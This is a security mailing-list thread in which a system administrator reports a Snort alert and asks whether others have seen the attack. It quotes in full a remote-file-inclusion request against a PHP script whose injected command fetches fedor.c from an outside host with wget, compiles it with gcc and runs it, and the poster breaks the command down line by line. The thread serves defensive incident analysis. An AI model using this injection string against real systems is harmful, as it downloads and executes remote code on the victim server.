Re: http://xfteam.net/fedor.c - Anyone seen this before??

[Dan <dan () lockedbox net>]

I realised my foobar, just after I had posted. (DNS is resolving, I didnt try
www. first)
A tty capable daemon. Interesting.. Surly "they" realise that apache runs as a
separate user on most systems(who runs it root?)
It was the only hit from that netblock so I guess that it was a scan.
And from looking at the google.jpg and the strings.txt i was lead to:
http://www.arplhmd.cjb.net/
Looks like he makes some scripts/tools, noting a google tool which could
account for the attempt on a dead link.

Regards,
Daniel.

Dan <dan () lockedbox net> wrote:

> Hi,
> Our Snort picked up an interesting attempt to download, compile and execute.
> Noting also the fact that the sub dir its attempting to access has not been
> there for over 4 months(/logjam/)?
>
> Has anyone actually seen what this fedor.c is? I have done some google'ing
but
> it comes up blank.
>
> Has anyone else noticed this kindof request recently?
>
> Is it just me or is xfteam.net not resolving anyway?
>
> Orignal HTTP request:
> GET /logjam/showhits.php?
rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f
> Breaking this down we get(twice):
> uname -a
> cd /tmp
> wget http://xfteam.net/fedor.c
> gcc -o f fedor.c
> ./f
>
>
> Regards,
> Daniel.
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html